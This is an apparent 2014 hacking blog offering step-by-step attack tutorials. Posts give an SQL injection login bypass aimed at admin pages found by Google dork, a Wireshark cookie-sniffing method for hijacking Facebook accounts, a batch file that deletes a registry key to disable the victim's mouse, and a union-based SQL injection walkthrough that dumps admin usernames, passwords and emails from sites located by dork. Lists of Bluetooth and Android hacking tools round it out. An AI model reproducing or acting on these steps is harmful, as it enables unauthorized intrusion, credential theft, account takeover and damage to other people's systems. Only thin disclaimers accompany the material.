ComRȁde PyRate

Thursday 27 November 2014

7 Most Popular Bluetooth Hacking Software to Hack Mobile Phones

mobile-hacking
We all are familiar with the term hacking and the disadvantages faced by anyone when it is being used in illegal ways. Previously hacking was restricted to computers or computer networks only but as the time changed this field has grown up and now mobile phones, especially the multimedia phones are more prone to hacking. There are various hacks and software already present on the web which helps hackers in hacking any multimedia phones. In this post I have outlined only Bluetooth Hacking Software. These software are very efficient and can hack any Bluetooth enabled device without any prior knowledge of user.

So here comes the list of useful Bluetooth hacking software.

1. Super Bluetooth Hack 1.08

This software is used for controlling and reading information from remote phone via bluetooth or infra. Phone list and SMS can be stored in HTML format. In addition to it, it will display information about battery, network and sim card.

2. Blue Scanner

Blue Scanner searches out for Bluetooth-enabled devices and try to extract as much information as possible for each newly discovered device in other words one can use this one to spy on others who are close.

3. Blue Sniff

BlueSniff is a simple utility for finding discoverable and hidden Bluetooth-enabled devices. It operates on Linux.

4. BlueBugger

This simply exploits the BlueBug (name of a set of Bluetooth security holes) vulnerability of the bluetooth-enabled devices. By exploiting these vulnerabilities one can access phone-book, calls lists and other information of that device.

5. BTBrowser

BT Browser is a J2ME application which can browse and explore the technical specification of surrounding bluetooth-enabled devices. One can browse device information and all supported profiles and services records of each device.

6. BTCrawler

BT Crawler is a scanner for Windows Mobile Based devices. It scans for other devices in range and performs service query. It implements Bluejacking and BlueSnarfing attacks.

7. BlueSnarfing

Bluesnarfing is a method of hacking into Bluetooth-enabled mobile phone and with this you can copy its entire information like contact book, etc. With this software you give the complete freedom to hacker, to send a “corruption code” to you which will completely shut-down the phone down and make it unusable for you.
Disclaimer: I have outlined these software for your information and knowledge purpose only. It’s an advice to all the multimedia phone users to keep off your Bluetooth and if any harm will occur then we do not take any responsibility.
Please leave your thoughts on Bluetooth hacking in the comments section below.




Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate

Home Your First Live Hacking Technique

There are many hacking techniques used for hacking a website. Here i am giving you a taste of SQL Injection method. SQL, OS, and LDAP injections occur when untrusted data is sent to an interpreter as part of a command or query. We can trick the interpreter into executing unintended commands. So, follow the below steps carefully. Now most of the sites are designed with SQL Injection in mind, hence the below method only works for poorly designed websites.

WARNING:
Any actions and or activities related to the material contained within this Website is solely your responsibility. The author and this sitewill not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

1) Go to Google and search for vulnerable ASP sites using "inurl:adminlogin.asp"



2) Choose a result

3) You will get a login window similar like this, use below data to login

Username : admin (always its admin)
Password : 'or'1'='1



4) If you are lucky, you will be redirected to the Admin Panel





5) Finished, you hacked a website!

the theory behind this hack is explained below,

SQL injection is the result of weak coding. Analyzing the above example, the site uses a SQL statement similar below to access and compare username and password from the database.

SELECT username,pwd FROM members WHERE 'username'='given username' AND 'pwd'='given password
when we type 'or'1'='1 in the password field it becomes
SELECT username,pwd FROM members WHERE 'username'='admin' AND 'pwd'=''or'1'='1'
So 1 = 1 will be always true and it proceeds the login. As for your knowledge it will not work with websites made of PHP. I will explain other techniques like XSS attacks in coming days. Happy Hacking!

 Yours sincerly, 
 Comrade Pyrate 
 

Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate

Wednesday 26 November 2014

How to HaCk a FaceBook AcCOunt With Wireshark (Easy Method)

 Step#1
Download The "WireShark" And Then install It
On Your System...
Download "WireShark" by given link...
adf .ly/qHzQb (remove space)
Step#2
Next Open The WireShark And Then Click On
Interface,..
Step#3
Now Choose A Network Then Continue The
Sniffing For Around Like 10 minutes.
Step#5
After A Maximum 10 minute Stop The Sniffing
By Going To A Capture Menu Like This.
Step#6
Its Important Step Now Filter To http.cookie
contains “datr” Like This. Then Filter The All
Search For http cookies With A Name Of
"datr" And There Is Facebook
Authentication’s Cookie Like This ,..
Step#7
Now Click On It And Then GoTo The Copy >
Bytes > Printable Text Only Like This . : -
Step #8
Now The Next You Have Must 3 Things..
Mozilla Firefox (Download the latest version) by given link..
mozilla_firefox.en.downloadastro.com/download/
Grease Monkey Download by given link..
adf .ly/qHzXf (remove space)
Cookie injector Download by given link..
adf .ly/qHzcY (remove space)
Then Open Facebook.com In Firefox
Make Sure You Are Not Login
.
Step #9
Press The button "Alt
+C" To Bring Up A Cookie Injector And Then
Simply Paste In A Cookie Value Into It.
Cookie injector Like this.
Step #10
Now Refresh Your Page So Then Finally You
Enter The Victim Account .
Enjoy
Note : This Method
Will Never Work If The Victim Is In
"https, Securre Browseing"
Thanks For Reading This Tutorial,






Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate

Basic trick to become a hacker !!!

basic step to become a hacker

N
ow i will show how to create fake virus in your computer, this is a good computer & notepad tricksto play with your friends :-)
S, this is the initial step to become a  hacker…
1–> open “notepad”
Type the commands given in given below :-
@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as “comrade.bat” extension
for example if your file name is “virus” save it as “virus.bat”
Hurray !!! i had created a virus !!
Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate

10 Best Android Hacks.




Android is one of the favorite mobile operating system, owned by Google Inc. As Android have took over the mobile market and its users are increasing in a great ratio. Main thing is that Android have revealed many of the features that are waiting by all users.  Its interface good and is user handy.

Apart from the normal mobile user, techie guys also like its flexible features that allows them to do various new task. As with this its security concerns also headed up. Recently we have noted that many of the cyber hackers are targeting Android users. There are many techie guys have also unrestricted the  features that are restricted by its owners, Google.

So I thing the below words are familiar to them but many of them have not been aware. Here I am discussing some of the tools that are meant for the Security tester, Ethical hacker and for those guys who really explore the tech world.


Lets see 10 Android tools that are meant for hacking and hackers.
1.Hackode :- Hackode : The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

2.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

3.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

4.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.

5.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6.zANTI:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7.Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

8.dSploit:- dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

9.AppUse – Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

10.Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.
  Enjoy Guys! and don't forget to post your comments. ©Comrade Pyrate

Make a virus that disable Mouse

how to disable mouse by a virus
Make a virus that disable Mouse
I had previously posted on making different batch files like matrix effect, opening no of web sites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm full it will disable your mouse so think before trying it on yourself.

Read Also :  Basic trick to become a hacker !!!


Open Notepad and copy below codes

     rem ---------------------------------

    rem Disable Mouse

    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

    reg delete %key%

    reg add %key% /v Start /t REG_DWORD /d 4

    rem ---------------------------------

Save this file as  virus.bat

Done you just created your virus.


 Enjoy Guys! and don't forget to post your comments. ©Comrade Pyrate

Hack Website By SQL Injiection


How to Hack any Site by Sql Injection?
Sub se pehle Google.co.in open karen. Wahan ye dork likhen:
inurl:.php?id=
Phir left side par Pages from India par click kar den.
Aap k paas Indian Sites aa jayengi.

Ab kisi bhi link ko open karen. Site kuch aisi hogi:
Www.Site.com/index.php?id=5
Lets see thats its Vulnerable or not. Type ' after id=5
The site will be like this:
Www.Site.com/index.php?id=5'
If it gives error, It means its Vulnerable to Hack.

Ab is k Columns find karen.
id=5 order by 1--
id=5 order by 2--
Isi tarah numbers barhate rahen jab tak error na aa jaye. For example, Agar 6 par error aaya to is k 5 Columns hain. Now find valid Column to attack on Site.
id=-5 union all select 1,2,3,4,5--
Agar is ka 2nd Column valid ho to hum is Column k through database aur tables find karenge.

Find its database version
id=5 union all select 1,@@version,3,4,5--
Agar is ka Database version 5 ho to hum easily tables maloom kar sakte hain. Agar 4 ho to humein table guess karna parrta hai. Table finding for version 5
id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Is se Site k tables aa jayenge. Hamein Admin ka data (Username,Pass) chahiye. Agar admin table tbl_admin etc ho to is ka Column find karenge
id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='tbl_admin'
Is se admin table k columns aa jayenge. Like Username,Password etc.

Now final step. Ab hum Admin data hasil karenge. Agar columns hon Admin, Password, Email to hum ye sub find karenge
id=5 union all select 1,group§concat(Username,0x3a,Password,0x3a,Email)
Aap k paas aapke kaam ki cheez aa jayegi. Yani Admin Id, Email aur Pass.



Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate